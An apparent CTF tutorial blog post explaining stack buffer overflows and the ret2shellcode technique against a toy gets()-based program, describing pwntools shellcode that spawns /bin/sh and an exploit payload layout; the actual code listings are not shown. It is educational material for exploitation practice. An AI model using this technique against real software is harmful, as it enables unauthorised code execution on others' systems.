Search This Blog

Saturday, February 24, 2024

[pwn-primer] understanding ret2shellcode + understanding stack based buffer overflow

This post is going to cover an essential pwn technique called ret2shellcode or is commonly referred to as Shellcode Injection. In a typical pwn challenge (especially if it's easy), we'll have a win() function to redirect program execution to in order to solve the challenge. However, there are instances where there is no win function. This is when this technique comes in.

Shellcode, in essence, are assembly instructions that can execute arbitrary commands. In real exploits, they're used to either spawn a shell (either root/admin or low privilege) or execute commands like display contents of a critical file. In the case of pwn CTF challenges, their used to spawn a root shell to get the flag on the remote server or to display the contents of flag.txt. 

I'll go over a simple program that can be exploited with the use of shellcode.


The program above is quite simple in nature. It just has a main function that defines a character buffer on the stack of 256 bytes. After a printf call is made displaying the address in memory of where the buffer_one character buffer is located. After, a gets call is made into the buffer_one buffer.

Guess this is a good time to explain the vulnerability.

The vulnerability in this program here is found at the gets call. Why? Because we see the buffer_one character buffer has been given a length of 256 bytes on the stack. However, the gets call here asks for user input. The vulnerability lies in the fact that the gets() call does not make sure that exactly 256 bytes have been written to that buffer. The user input can exceed 256 bytes, thus accessing arbitrary memory locations. 

All this is occuring in a data structure in memory called the stack. Every function in C programs, at runtime, is initialized with a stack (or sometimes refered to as a stack frame). These stack frame hold the local variables of the functions they are defined in. For example, in the program above, there is one stack frame for the 'main' function and the character buffer is considered to be 'local' to the main function stack frame. This data structure operates using PUSH and POP operations. These PUSH and POP instructions PUSH data onto the stack and POP data off of the stack. 

A buffer overflow vulnerability can occur on the stack or on another data structure that deals with dynamically allocating space in memory called the heap, but for this post we will focus on the stack. A stack overflow vulnerability in this case means we can overwrite past the specified buffer size, accessing other important sections on the stack, such as other local variables, the base pointer and even one other important register, the saved return address.

On the stack, the return address is essentially an address that points to where execution is supposed to be redirected to once that respective function has finished execution. By overwriting this saved return address with an address of our own, we can redirect execution to whatever we want. 

Let's go back to the program and see this in action. 

After compiling the program in gcc, we see the program output once executed. 


As seen in the source code, the program outputs the address of where the stack is in memory. The next line shows an empty space, symbolizing a hang. This is where the gets() call is being initiated. By inserting more than 256 bytes, the program should crash. A crash in the program confirms the presence of the buffer overflow vulnerability. 


Junk bytes inserted into the program results in a segmentation fault. The program has crashed and the vulnerability is confirmed. There's no win function to redirect execution to, as discussed before and shellcode will have to be used. pwntools is a python based library that assists with exploit script writing. This library hosts a host of shellcode to perform different operations across different architectures. In our case, we're working with a 64 bit program, so the shellcode assembly instructions will be 64 bit.

execve('/bin/sh') syscall shellcode


the shellcode above execute an execve syscall that executes the path '/bin/sh' as the parameter to spawn a shell. If you're not well versed in how 64 bit functions and parameters are placed in assembly, then I recommend you get yourself informed on that. The first 4 instructions push the string '/bin/sh' represented by 0x732f2f2f6e69622f onto the stack and finally inserts it into rdi. The following instructions perform XOR and stack PUSH POP operations and ultimately calls execve().

Final Exploit Script


exploit script is quite simple. most of it is utilizing pwntools methods. I can't overemphasize how easy pwntools has made writing exploits. All the script does is use the shellcraft.sh(), which is the equivalent to the execve syscall we saw above, except in this instance is accessible through shellcraft.sh(). After the next section simply takes the outputted stack address and converts it to base 16, which is hexadecimal and prints that out to the screen. Lastly, the real payload is organised in order. 256 bytes of capital A's (junk bytes) and appends the shellcode to it to fill the buffer_one buffer on the stack, fill the rbp register with more junk bytes (0xcafebabe) and finally point rip to the buffer address where the stack is located. This basically inserts the shellcode onto the stack, and ultimately redirects execution to where the shellcode has been injected, ultimately executing our own code. 

the exploit ran and we can see we have shell. Quite a simple technique. I'm sure i butchered some of the explanation but essentially this is how shellcode works. We inject it onto the stack of a vulnerable process and have execution point to where the shellcode is injected to.


No comments:

Post a Comment